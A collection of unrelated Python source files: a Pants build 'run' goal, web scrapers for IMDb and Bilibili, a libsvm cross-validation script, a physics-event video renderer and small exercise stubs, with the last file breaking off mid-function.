class RestartableField(BoolField):
alias = "restartable"
default = False
help = help_text(
"""
If true, runs of this target with the `run` goal may be interrupted and
restarted when its input files change.
"""
)
@dataclass(frozen=True)
class RunRequest:
digest: Digest
# Values in args and in env can contain the format specifier "{chroot}", which will
# be substituted with the (absolute) chroot path.
args: Tuple[str, ...]
extra_env: FrozenDict[str, str]
immutable_input_digests: Mapping[str, Digest] | None = None
append_only_caches: Mapping[str, str] | None = None
def __init__(
self,
*,
digest: Digest,
args: Iterable[str],
extra_env: Optional[Mapping[str, str]] = None,
immutable_input_digests: Mapping[str, Digest] | None = None,
append_only_caches: Mapping[str, str] | None = None,
) -> None:
object.__setattr__(self, "digest", digest)
object.__setattr__(self, "args", tuple(args))
object.__setattr__(self, "extra_env", FrozenDict(extra_env or {}))
object.__setattr__(
self, "immutable_input_digests", FrozenDict(immutable_input_digests or {})
)
object.__setattr__(self, "append_only_caches", FrozenDict(append_only_caches or {}))
def to_run_in_sandbox_request(self) -> RunInSandboxRequest:
return RunInSandboxRequest(
args=self.args,
digest=self.digest,
extra_env=self.extra_env,
immutable_input_digests=self.immutable_input_digests,
append_only_caches=self.append_only_caches,
)
class RunDebugAdapterRequest(RunRequest):
"""Like RunRequest, but launches the process using the relevant Debug Adapter server.
The process should be launched waiting for the client to connect.
"""
class RunInSandboxRequest(RunRequest):
"""A run request that launches the process in the sandbox for use as part of a build rule.
The arguments and environment should only use values relative to the build root (or prefixed
with `{chroot}`), or refer to binaries that were fetched with `BinaryPathRequest`.
Presently, implementors can opt to use the existing as not guaranteeing hermeticity, which will
internally mark the rule as uncacheable. In such a case, non-safe APIs can be used, however,
this behavior can result in poorer performance, and only exists as a stop-gap while
implementors work to make sure their `RunRequest`-generating rules can be used in a hermetic
context, or writing new custom rules. (See the Plugin Upgrade Guide for details).
"""
class RunSubsystem(GoalSubsystem):
name = "run"
help = help_text(
"""
Runs a binary target.
This goal propagates the return code of the underlying executable.
If your application can safely be restarted while it is running, you can pass
`restartable=True` on your binary target (for supported types), and the `run` goal
will automatically restart them as all relevant files change. This can be particularly
useful for server applications.
"""
)
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return RunFieldSet in union_membership
args = ArgsListOption(
example="val1 val2 --debug",
tool_name="the executed target",
passthrough=True,
)
# See also `test.py`'s same option
debug_adapter = BoolOption(
default=False,
help=softwrap(
"""
Run the interactive process using a Debug Adapter
(https://microsoft.github.io/debug-adapter-protocol/) for the language if supported.
The interactive process used will be immediately blocked waiting for a client before
continuing.
"""
),
)
class Run(Goal):
subsystem_cls = RunSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
async def _find_what_to_run(
goal_description: str,
) -> tuple[RunFieldSet, Target]:
targets_to_valid_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
RunFieldSet,
goal_description=goal_description,
no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
),
)
mapping = targets_to_valid_field_sets.mapping
if len(mapping) > 1:
raise TooManyTargetsException(mapping, goal_description=goal_description)
target, field_sets = next(iter(mapping.items()))
if len(field_sets) > 1:
raise AmbiguousImplementationsException(
target,
field_sets,
goal_description=goal_description,
)
return field_sets[0], target
@goal_rule
async def run(
run_subsystem: RunSubsystem,
debug_adapter: DebugAdapterSubsystem,
global_options: GlobalOptions,
workspace: Workspace, # Needed to enable sideeffecting.
complete_env: CompleteEnvironmentVars,
) -> Run:
field_set, target = await _find_what_to_run("the `run` goal")
await _warn_on_non_local_environments((target,), "the `run` goal")
request = await (
Get(RunRequest, RunFieldSet, field_set)
if not run_subsystem.debug_adapter
else Get(RunDebugAdapterRequest, RunFieldSet, field_set)
)
restartable = target.get(RestartableField).value
if run_subsystem.debug_adapter:
logger.info(
softwrap(
f"""
Launching debug adapter at '{debug_adapter.host}:{debug_adapter.port}',
which will wait for a client connection...
"""
)
)
result = await Effect(
InteractiveProcessResult,
InteractiveProcess(
argv=(*request.args, *run_subsystem.args),
env={**complete_env, **request.extra_env},
input_digest=request.digest,
run_in_workspace=True,
restartable=restartable,
keep_sandboxes=global_options.keep_sandboxes,
immutable_input_digests=request.immutable_input_digests,
append_only_caches=request.append_only_caches,
),
)
return Run(result.exit_code)
@memoized
def _unsupported_debug_adapter_rules(cls: type[RunFieldSet]) -> Iterable:
"""Returns a rule that implements DebugAdapterRequest by raising an error."""
@rule(_param_type_overrides={"request": cls})
async def get_run_debug_adapter_request(request: RunFieldSet) -> RunDebugAdapterRequest:
raise NotImplementedError(
"Running this target type with a debug adapter is not yet supported."
)
return collect_rules(locals())
async def _run_request(request: RunFieldSet) -> RunInSandboxRequest:
run_request = await Get(RunRequest, RunFieldSet, request)
return run_request.to_run_in_sandbox_request()
@memoized
def _run_in_sandbox_behavior_rule(cls: type[RunFieldSet]) -> Iterable:
"""Returns a default rule that helps fulfil `experimental_run_in_sandbox` targets.
If `RunInSandboxBehavior.CUSTOM` is specified, rule implementors must write a rule that returns
a `RunInSandboxRequest`.
"""
@rule(_param_type_overrides={"request": cls})
async def not_supported(request: RunFieldSet) -> RunInSandboxRequest:
raise NotImplementedError(
"Running this target type within the sandbox is not yet supported."
)
@rule(_param_type_overrides={"request": cls})
async def run_request_hermetic(request: RunFieldSet) -> RunInSandboxRequest:
return await _run_request(request)
@_uncacheable_rule(_param_type_overrides={"request": cls})
async def run_request_not_hermetic(request: RunFieldSet) -> RunInSandboxRequest:
return await _run_request(request)
default_rules = {
RunInSandboxBehavior.NOT_SUPPORTED: [not_supported],
RunInSandboxBehavior.RUN_REQUEST_HERMETIC: [run_request_hermetic],
RunInSandboxBehavior.RUN_REQUEST_NOT_HERMETIC: [run_request_not_hermetic],
RunInSandboxBehavior.CUSTOM: [],
}
return collect_rules(
{_rule.__name__: _rule for _rule in default_rules[cls.run_in_sandbox_behavior]}
)
def rules():
return collect_rules()
|
import logging as log
from pprint import pformat
GOT_LOGGER = False
def get_logger():
"Helper function to get the logger"
global GOT_LOGGER
if GOT_LOGGER:
return log
GOT_LOGGER = True
logger = log.getLogger()
logger.setLevel(log.DEBUG)
ch = log.StreamHandler()
ch.setFormatter(log.Formatter('%(levelname)s: %(message)s'))
logger.removeHandler(0)
logger.addHandler(ch)
return log
|
import curses
import random
import time
def hud(win, score):
win.addstr(1, 1, "Score: " + str(score))
def update_player(win_col, k, player):
if k == ord("a") and player[2] >= 1:
player[2] -= 1
if k == ord("d") and player[2] <= win_col:
player[2] += 1
if k == ord("s"):
player[3] = True
return player
def main(stdscr):
curses.noecho()
curses.cbreak()
curses.curs_set(0)
score = 0
game_win = curses.newwin(0, 0)
game_win.nodelay(True)
game_win_max = game_win.getmaxyx()
hud_win = curses.newwin(3, 11, 0, 0)
hud_win.border()
hud_win.nodelay(True)
hud(hud_win, score)
# Player = [Char, Y, X, Shoot]
player = \
[ \
'^', game_win_max[0]-1, game_win_max[1]//2, False \
]
while True:
game_win.clear()
hud_win.clear()
hud(hud_win, score)
player[3] = False
k = game_win.getch()
if k == "Err":
k = ""
player = update_player(game_win_max[1], k, player)
game_win.addch(player[1], player[2], player[0])
game_win.refresh()
hud_win.refresh()
time.sleep(0.1)
curses.nocbreak()
curses.echo()
if __name__ == "__main__":
curses.wrapper(main)
|
import torch
from models.faster_rcnn import fasterrcnn_resnet_fpn
from models.centernet.ctdet import CenterNetDetect
def get_model_faster(name, num_classes, pretrained_path=None):
with_mask = name.find('mask') != -1
resnet_backbone = name[name.find('resnet'):name.find('resnet') + 9].strip('_') # 'resnet18', 'resnet34', 'resnet50'
model = fasterrcnn_resnet_fpn(num_classes=num_classes,
pretrained_path=pretrained_path,
mask=with_mask,
backbone=resnet_backbone)
return model
def get_model_center(model_params, loss_params=None, pretrained_path=None):
heads = {'hm': model_params.heads_hm, 'wh': model_params.heads_wh, 'reg': model_params.heads_reg}
model = CenterNetDetect(model_params.num_classes, model_params.arch, heads, model_params.head_conv,
max_per_image=model_params.max_per_image, loss_params=loss_params)
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)
model.load_state_dict(state_dict)
return model
def prepare_model(num_classes, device, pretrained_path, model_params, distributed, ids_gpu, loss_params=None):
pretrained_path = pretrained_path if len(pretrained_path) > 0 else None
if model_params.name == 'center':
model = get_model_center(model_params, loss_params, pretrained_path=pretrained_path)
else:
model = get_model_faster(model_params.name, num_classes, pretrained_path=pretrained_path)
model.to(device)
model_without_ddp = model
if distributed:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[ids_gpu], find_unused_parameters=True)
model_without_ddp = model.module
return model, model_without_ddp
|
import xlrd
import sys
import os
data = xlrd.open_workbook("FormatDatalibsvm.xlsx")
table = data.sheet_by_name('FormatDatalibsvm')
nrows = table.nrows
def init():
os.system('del learn.txt')
os.system('del predict.txt')
for j in xrange(0, nrows):
init()
learn = open('learn.txt' ,'w')
pre = open('predict.txt', 'w')
#print j
for i in xrange(0, nrows):
T = table.row_values(i)
if i == j:
for ele in T:
pre.write(str(ele)) #将待预测的数据写入文件
pre.write('\n')
else:
for ele in T:
learn.write(str(ele)) #将训练的数据写入文件
learn.write('\n')
learn.close()
pre.close()
#print 'Hi'
os.system('svm-scale.exe learn.txt > learn.scale')
os.system('svm-train.exe learn.scale train_file')
os.system('svm-predict.exe predict.txt train_file output_file >> D:\\result.txt')
os.system('del learn.scale train_file output_file')
|
import re
import sys
import requests
import pandas as pd
from bs4 import BeautifulSoup
# Create all required lists
ranks=[]
movie_names=[]
links=[]
Rating_Values=[]
Directors=[]
Writers=[]
Stars=[]
casts=[]
Genres=[]
Certificate=[]
Country=[]
Language=[]
Release_Date=[]
Filming_Locations=[]
Budget=[]
Opening_Weekend_USA=[]
Gross_USA=[]
Cumulative_Worldwide_Gross=[]
Runtime=[]
def make_soup(url):
"""
Use requests and BeautifulSoup 4 library to turn the parameter
URL into and return HTML code in BeautifulSoup format.
"""
html = requests.get(url) #Creat html file by url
html.encoding = 'utf-8'
soup = BeautifulSoup(html.text, 'html5lib')
return soup
def get_movie(soup):
"""
Return dictionary of rank, movie name and movie information link.
"""
rank = 1;
movies = {}
link = 'https://www.imdb.com'
if soup.find_all('td', class_='titleColumn') != []:
for tdtag in soup.find_all('td', class_='titleColumn'):
info = {}
year = tdtag.find_all('span', class_='secondaryInfo')[0].text
info[tdtag.find_all('a')[0].text + ' ' + year] = link + tdtag.find_all('a')[0].get('href')
movies[str(rank)] = info
rank += 1
return movies
def blok(name, soup, type_list):
"""
Set information from class 'txt-block' to corresponding list
"""
for date in soup.find_all('div', class_='txt-block'):
if name in date.text:
date = date.text.lstrip()
date = ' '.join(date.split())
if (':' in date):
type_list.append(date[date.find(':')+2:])
else:
type_list.append(date)
print(date)
return 0
def info(url):
"""
Set all detail information from movie's information page to corresponding list
"""
soup = make_soup(url)
if soup.find_all('span', itemprop="ratingValue"):
for ratingValue in soup.find_all('span', itemprop="ratingValue"):
print('Rating Value:', ratingValue.text)
Rating_Values.append(ratingValue.text)
else:
Rating_Values.append('')
if soup.find_all('div', class_='credit_summary_item'):
d=0
w=0
s=0
for summary in soup.find_all('div', class_='credit_summary_item'):
title = summary.find_all('h4')[0].text
names = []
for name in summary.find_all('a'):
name = re.sub(r'<[^>]*>', '', str(name)).lstrip()
names.append(name)
names = ', '.join(names)
if 'Director' in title:
Directors.append(names)
d=1
if 'Writers' in title:
Writers.append(names)
w=1
if 'Stars' in title:
Stars.append(names)
s=1
print(title, names)
if d == 0:
Directors.append('')
if w == 0:
Writers.append('')
if s == 0:
Stars.append('')
else:
Directors.append('')
Writers.append('')
Stars.append('')
if soup.find_all('div', class_='article', id='titleCast'):
c_list = []
for article in soup.find_all('div', class_='article', id='titleCast'):
for cast_list in article.find_all('table', class_='cast_list'):
for cast in cast_list.find_all('tr', class_='odd'):
for name in cast.find_all('td', class_=''):
name = name.text.lstrip()
name = ' '.join(name.split())
c_list.append(name)
c_list = ', '.join(c_list)
casts.append(c_list)
print("cast_list", c_list)
else:
casts.append('')
if soup.find_all('div', class_='see-more inline canwrap'):
for keywords in soup.find_all('div', class_='see-more inline canwrap'):
title = keywords.find_all('h4', class_='inline')[0].text
words = []
if title == 'Genres:':
for c_type in keywords.find_all('a'):
c_type = re.sub(r'<[^>]*>', '', str(c_type)).lstrip()
words.append(c_type)
Genres.append(c_type)
print(title, c_type)
else:
Genres.append('')
blok('Country', soup, Country)
blok('Language', soup, Language)
blok('Release Date', soup, Release_Date)
blok('Filming Locations', soup, Filming_Locations)
blok('Budget', soup, Budget)
blok('Opening Weekend USA', soup, Opening_Weekend_USA)
blok('Gross USA', soup, Gross_USA)
blok('Cumulative Worldwide Gross', soup, Cumulative_Worldwide_Gross)
blok('Runtime', soup, Runtime)
blok('Certificate', soup, Certificate)
for i in ranks, links, Rating_Values, Directors, Writers, Stars, casts, Genres, \
Certificate, Country, Language, Release_Date, Filming_Locations, Budget, \
Opening_Weekend_USA, Gross_USA, Cumulative_Worldwide_Gross, Runtime:
if len(i) != len(Directors):
i.append('')
print('\n')
def movies_info(movies_dict):
"""
Use link of movie's information page call info function to crawl information,
and set all information to corresponding list
"""
for key in movies_dict:
rank = key
for name in movies_dict[key]:
movie_name = name
link = movies_dict[key][name]
ranks.append(rank)
movie_names.append(movie_name)
links.append(link)
print(rank, movie_name, link)
info(link)
if __name__ == '__main__':
url = "https://www.imdb.com/chart/top/"
soup = make_soup(url)
movies = get_movie(soup)
movies_info(movies)
num=1 # Check the size of all lists
for i in ranks, links, Rating_Values, Directors, Writers, Stars, casts, \
Genres, Certificate, Country, Language, Release_Date, Filming_Locations, \
Budget, Opening_Weekend_USA, Gross_USA, Cumulative_Worldwide_Gross, Runtime:
print(num, len(i))
num += 1
# Integrate all lists into pandas format (dataframe)
dataframe = pd.DataFrame({'Rank': ranks, 'Movie Names': movie_names,
'Links': links, 'Rating Values': Rating_Values, 'Directors': Directors,
'Writers': Writers, 'Stars': Stars, 'Casts': casts, 'Genres': Genres,
'Certificate': Certificate, 'Country': Country, 'Language': Language,
'Release Date': Release_Date, 'Filming Locations': Filming_Locations,
'Budget': Budget, 'Opening Weekend USA': Opening_Weekend_USA,
'Gross USA': Gross_USA, 'Cumulative Worldwide Gross': Cumulative_Worldwide_Gross, 'Runtime': Runtime})
# Make the organized dataframe into a CSV file named IMDb_top_250.csv and save it in the current directory
dataframe.to_csv("IMDb_top_250.csv",index=False,sep=',')
|
def count_common_chars(s1, s2):
"""
Given two strings s1 and s2, counts
the number of characters they have in common,
i.e. these characters must be equal and
appear at the same location in the strings.
For example, 'abcd' and 'a123' have one character in common.
'ab' and 'ba' have 0 characters in common.
"""
raise NotImplementedError()
def hack(candidates, attempt):
"""
Hacks the system.
candidates is a list of strings representing potential passwords.
attempt is a function that takes one argument X and returns
the number of characters the argument X and the actual password
have in common. This function can only be called a finite number of times.
hack should return the correct password, i.e. one of the
strings in the list candidates for which attempt
returned a value indicating that all characters were correct.
"""
raise NotImplementedError()
|
#coding:gb2312
#使用多个文件
def words_num(filename):
try:
with open(filename) as f:
contents = f.read()
except FileNotFoundError:
"""
msg = "Sorry,the file "+filename+" does not exit."
print(msg)
"""
pass #pass语句可以让python什么都不要做
else:
words = contents.split()
num_words = len(words)
print(filename.title()+"这篇文章一共有 "+str(num_words)+" 个单词。")
filenames = ['test.txt','pyhton_note.txt','lyl.txt','python_note.txt']
for filename in filenames:
words_num(filename)
|
#!/usr/bin/env python
from __future__ import print_function
import tqdm
import argparse
import os
import numpy as np
import array
import fastjet as fj
from pyjetty.mputils import MPBase
from pyjetty.mputils import DataIO
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
import ROOT
ROOT.gROOT.SetBatch(True)
class Data2MP4(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(file_list='PbPb_file_list.txt', n_events=500, output='output', run_jetfinder=False)
super(Data2MP4, self).__init__(**kwargs)
self.data_io = DataIO(file_list=self.file_list)
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, 0., 2.*ROOT.TMath.Pi())
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
#self.hetaphi_jet = ROOT.TH2F('_hetaphi_jet', '_hetaphi_jet;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 101, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi_jet = ROOT.TH2F('_hetaphi_jet', '_hetaphi_jet;#eta;#varphi', 51, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.mean_eta = ROOT.TH1F('_hmean_eta', '_hmean_eta;<#eta>', 101, -0.3, 0.3)
# self.mean_phi = ROOT.TH1F('_hmean_phi', '_hmean_phi;<#varphi>', 101, ROOT.TMath.Pi()-0.3, ROOT.TMath.Pi()+0.3)
self.mean_phi = ROOT.TH1F('_hmean_phi', '_hmean_phi;<#varphi>', 101, -0.3, +0.3)
self.mean_e = ROOT.TH1F('_hmean_e', '_hmean_e;<E (GeV)>', 100, 0, 2)
self.tc = None
if self.run_jetfinder:
fj.ClusterSequence.print_banner()
def run(self):
_err_level_tmp = ROOT.gErrorIgnoreLevel
if self.tc is None:
self.tc = ROOT.TCanvas('_tc', '_tc', 800, 800)
self.tc.Divide(2,2)
ROOT.gErrorIgnoreLevel = ROOT.kWarning
for iev in tqdm.tqdm(range(self.n_events)):
parts = self.data_io.load_event(offset=10000)
if self.run_jetfinder:
jet_R0 = 0.4
jet_def = fj.JetDefinition(fj.antikt_algorithm, jet_R0)
jets = fj.sorted_by_pt(jet_def(parts))
if len(jets) > 0:
jet = jets[0]
else:
jet = fj.PseudoJet()
else:
jet = fj.PseudoJet()
self.hetaphi.Reset()
self.hetaphi_jet.Reset()
#_tmp = [self.hetaphi.Fill(p.eta(), jet.delta_phi_to(p), p.e()) for p in parts]
_tmp = [self.hetaphi.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in parts]
if self.run_jetfinder:
# _tmp = [self.hetaphi_jet.Fill(p.eta(), jet.delta_phi_to(p), p.e()) for p in jet.constituents()]
_tmp = [self.hetaphi_jet.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in jet.constituents()]
_e = [p.e() for p in parts]
_phi = [p.phi()-ROOT.TMath.Pi() for p in parts]
# _phi = [jet.delta_phi_to(p) for p in parts]
_eta = [p.eta() for p in parts]
# self.mean_eta.Fill(self.hetaphi.GetMean(1))
self.mean_eta.Fill(np.mean(_eta))
# self.mean_phi.Fill(self.hetaphi.GetMean(2))
self.mean_phi.Fill(np.mean(_phi))
self.mean_e.Fill(np.mean(_e))
self.tc.cd()
# self.hetaphi.Scale(1./self.hetaphi.Integral())
self.hetaphi.SetMaximum(10.)
self.hetaphi.SetMinimum(0.)
self.tc.cd(1)
self.hetaphi.Draw('colz')
# self.hetaphi.Draw('lego2')
self.hetaphi_jet.SetLineColor(ROOT.kRed)
self.hetaphi_jet.SetFillColor(ROOT.kRed)
self.hetaphi_jet.SetFillStyle(1001)
self.hetaphi_jet.Draw('cont3 same')
self.tc.cd(2)
self.mean_e.Draw()
self.tc.cd(3)
self.mean_phi.Draw()
self.tc.cd(4)
self.mean_eta.Draw()
self.tc.SaveAs('_{}_{}.png'.format(self.output, iev), '.png')
ROOT.gErrorIgnoreLevel = _err_level_tmp
def save_mp4(self):
# os.system('ffmpeg -i _{}_%01d.png -vcodec mpeg4 -y {}.mp4'.format(self.output, self.output))
os.system('ffmpeg -r 4 -f image2 -s 1920x1080 -i _{}_%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p {}.mp4'.format(self.output, self.output))
class PythiaJetty(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(pthatmin=100, eta_max=1, jet_pt_min=10, jet_R0=0.4)
super(PythiaJetty, self).__init__(**kwargs)
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=None)
pyconf.add_standard_pythia_args(parser)
args = parser.parse_args('')
args.py_pthatmin = self.pthatmin
mycfg = []
self.pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
if not self.pythia:
print("[e] pythia initialization failed.")
self.parts_pythia = None
def get_event(self):
if not self.pythia:
return None
parts_selector = fj.SelectorAbsEtaMax(self.eta_max)
jet_selector = fj.SelectorPtMin(self.jet_pt_min) & fj.SelectorAbsEtaMax(self.eta_max - 1.05 * self.jet_R0)
jet_def = fj.JetDefinition(fj.antikt_algorithm, self.jet_R0)
while True:
if not self.pythia.next():
continue
self.parts_pythia = pythiafjext.vectorize_select(self.pythia, [pythiafjext.kFinal])
parts_gen = parts_selector(self.parts_pythia)
signal_jets = fj.sorted_by_pt(jet_selector(jet_def(self.parts_pythia)))
if len(signal_jets) < 1:
continue
else:
break
return self.parts_pythia
class Data2MP4Morph(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(file_list='PbPb_file_list.txt', n_events=500, output='output')
super(Data2MP4Morph, self).__init__(**kwargs)
self.data_io = DataIO(file_list=self.file_list)
# self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
# self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 101, -1, 1, 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#varphi;#eta', 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi(), 101, -1, 1)
self.tc = None
self.iframe = 0
self.pythia = PythiaJetty(pthatmin=100, eta_max=1, jet_pt_min=20, jet_R0=0.4)
def make_a_frame(self, h):
self.tc.cd()
for ibx in range(1, h.GetNbinsX() + 1):
for iby in range(1, h.GetNbinsY() + 1):
if h.GetBinContent(ibx, iby) < 1e-1:
h.SetBinContent(ibx, iby, 1e-1)
h.SetMaximum(100.)
h.SetMinimum(1e-1)
# h.Draw('colz')
h.SetName('{}_f{}'.format(h.GetName().split('_f')[0], self.iframe))
h.Draw('LEGO2 FB BB')
# h.Draw('surf2 FB BB')
# h.Draw('CONT3 COLZ')
# h.Draw('CYL LEGO2 COLZ')
h.SetLineColor(ROOT.kWhite)
h.SetLineColorAlpha(ROOT.kWhite, 1.)
# h.Draw('CYL SURF2')
# h.Draw('SURF2')
# h.Draw('PSR LEGO2')
# self.tc.SetLogz()
self.tc.SaveAs('_{}_{}.png'.format(self.output, self.iframe), '.png')
self.iframe = self.iframe + 1
def morph(self, hfrom, hto, nframes):
_hmorph = hfrom.Clone("_hmorph")
_hmorph.SetDirectory(0)
_hdeltas = hto.Clone('_delta')
_hdeltas.Add(hfrom, -1.)
for ifr in tqdm.tqdm(range(1, nframes + 1)):
fr = 1.0 * ifr / nframes
for ibx in range(1, hfrom.GetNbinsX() + 1):
for iby in range(1, hfrom.GetNbinsY() + 1):
v = hfrom.GetBinContent(ibx, iby) + fr * _hdeltas.GetBinContent(ibx, iby)
_hmorph.SetBinContent(ibx, iby, v)
self.make_a_frame(_hmorph)
def run(self):
_err_level_tmp = ROOT.gErrorIgnoreLevel
if self.tc is None:
self.tc = ROOT.TCanvas('_tc', '_tc', 800, 800)
ROOT.gErrorIgnoreLevel = ROOT.kWarning
_hetaphi_next = self.hetaphi.Clone("_next")
for iev in tqdm.tqdm(range(self.n_events)):
parts = self.data_io.load_event(offset=10000)
_hetaphi_next.Reset()
#_tmp = [_hetaphi_next.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in parts]
#_tmp = [_hetaphi_next.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in parts]
pyev = None
if self.pythia:
pyev = self.pythia.get_event()
if pyev:
_tmp = [_hetaphi_next.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in pyev]
if iev > 0:
self.morph(self.hetaphi, _hetaphi_next, 10)
self.hetaphi.Reset()
#_tmp = [self.hetaphi.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in parts]
if pyev:
_tmp = [self.hetaphi.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in pyev]
self.make_a_frame(self.hetaphi)
ROOT.gErrorIgnoreLevel = _err_level_tmp
def save_mp4(self):
# os.system('ffmpeg -r 10 -i _{}_%d.png -vcodec mpeg4 -y {}.mp4'.format(self.output, self.output))
# good page: https://hamelot.io/visualization/using-ffmpeg-to-convert-a-set-of-images-into-a-video/
os.system('ffmpeg -r 60 -f image2 -s 1920x1080 -i _{}_%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p {}.mp4'.format(self.output, self.output))
def main():
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=os.path.basename(__file__))
parser.add_argument('--flist', help='data from a file list', default='', type=str)
parser.add_argument('--pythia', help='run pythia', default=False, action='store_true')
parser.add_argument('--output', default="data2mp4", type=str)
parser.add_argument('--nev', help='number of events', default=500, type=int)
parser.add_argument('--convert-only', default=False, action='store_true')
parser.add_argument('--jf', default=False, action='store_true')
args = parser.parse_args()
# palette = []
# paletteSize = 2*2048 #1024
# for i in range(0, paletteSize):
# palette.append(ROOT.TColor.GetColor(1. - (i * 1.0) / paletteSize, 1. - (i * 1.0) / paletteSize, 1. - (i * 1.0) / paletteSize))
# palette_i = array.array('i', palette)
# ROOT.gStyle.SetPalette(paletteSize, palette_i)
# ROOT.gStyle.SetPalette(paletteSize, palette_i)
# https://root.cern.ch/doc/master/classTColor.html
ROOT.gStyle.SetPalette(53)
# ROOT.gStyle.SetPalette(56)
ROOT.gStyle.SetOptStat(0)
ROOT.gStyle.SetOptTitle(0)
if len(args.flist) > 0:
d2mp4 = Data2MP4(file_list=args.flist, output=args.output, n_events=args.nev, run_jetfinder=args.jf)
if args.pythia:
d2mp4 = Data2MP4Morph(file_list=args.flist, output=args.output, n_events=args.nev)
if d2mp4:
if args.convert_only is False:
if not os.path.isfile(args.flist):
print('[e] input file does not exists')
return
d2mp4.run()
d2mp4.save_mp4()
if __name__ == '__main__':
main()
|
from translate import translate
import getdata
import requests
import json
class video():
sockip = ['112.192.179.75:4258', '175.154.44.87:4258', '124.161.43.184:4258', '119.5.176.249:4258',
'175.155.50.78:4258', '112.194.178.181:4258', '124.161.212.88:4258', '119.5.179.10:4258',
'112.194.178.137:4258', '112.192.182.77:4258', '175.155.51.160:4258', '112.192.179.15:4258',
'112.194.178.22:4258', '119.5.177.126:4258', '119.5.177.172:4258', '119.5.189.136:4258',
'175.155.51.94:4258', '119.5.177.191:4258', '175.154.44.153:4258', '175.155.50.74:4258']
av = "" ''
bv = ""
mid_reply = {}#每一句回复所对应的id
def __init__(self,*args):
for i in args:
if i[0:2]=="BV":
self.bv = i
else:
self.av = i
if self.av!="" and self.bv =="":
self.bv = translate().enc(self.av)
if self.bv!="" and self.av =="":
self.av = translate().dec(self.bv)
def getav(self,av):
self.av = av
self.bv = translate().enc(self.av)
def getbv(self,bv):
self.bv = av
self.av = translate().dec(self.bv)
def putav(self):
return self.av
def putbv(self):
return self.bv
def check(self):
if self.av =="":
raise NameError("you should set av")
def getbasic(self):
self.check()
answer = {}
url = "http://api.bilibili.com/archive_stat/stat?aid="+self.av+"&type=jsonp"
dict_json = getdata.getdict(url)
print(dict_json)
answer = dict_json["data"]
if dict_json["code"] != 0:
raise Exception("请求错误,请重新检查")
url = "https://api.bilibili.com/x/web-interface/view?aid="+self.av# 关于视频类的,这段更重要,以后有需要,直接看这段就好
dict_json = getdata.getdict(url)
print("hhhhhhhhhhhhhhhhh")
if dict_json["code"] != 0:
# raise Exception("请求错误,请重新检查")
print("youwentiaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
answer["videos"] = []
answer["tid"] = []
answer["tname"] = []
answer["copyright"] = []
answer["title"] = []
answer["desc"] = [] # 视频简介
answer["videos"] = dict_json["data"]["videos"]
answer["tid"] = dict_json["data"]["tid"]
answer["tname"] = dict_json["data"]["tname"]
answer["copyright"] = dict_json["data"]["copyright"]
answer["title"] = dict_json["data"]["title"]
answer["desc"] = dict_json["data"]["desc"] #视频简介
return answer
def getbasicinfo(self):
params = {"aid":"av值","view":"播放量","danmaku":"弹幕量","reply":"回复数","favorite":"收藏数","coin":"硬币数","share":"分享数","like":"点赞数","copyright":"1自制2转载"}
for key,value in params.items():
print(key," ",value)
def gettag(self):
self.check()
url = "http://api.bilibili.com/x/tag/archive/tags?aid="+self.av+"&jsonp=jsonp "
dict_json = getdata.getdict(url)
if dict_json["code"] != 0:
raise Exception("请求错误,请重新检查")
else:
dictinfo = {}
for i in dict_json["data"]:
dictinfo[i["tag_name"]] = i["tag_id"]
return dictinfo
def gettaginfo(self):
print("标签名称 标签id")
def getdict(self,page,av,k):
url = "http://api.bilibili.com/x/v2/reply?jsonp=jsonp&;pn="+page+"&type=1&oid="+av
if k<0:
p = requests.get(url)
res_p = p.content.decode()
return json.loads(res_p)
elif k>=0 and k< self.sockip:
proxies = {
"http": self.sockip[k],
"https": self.sockip[k],
}
p = requests.get(url)
res_p = p.content.decode()
return json.loads(res_p)
else:
raise Exception("超出list范围")
def getreply(self,count):
self.check()
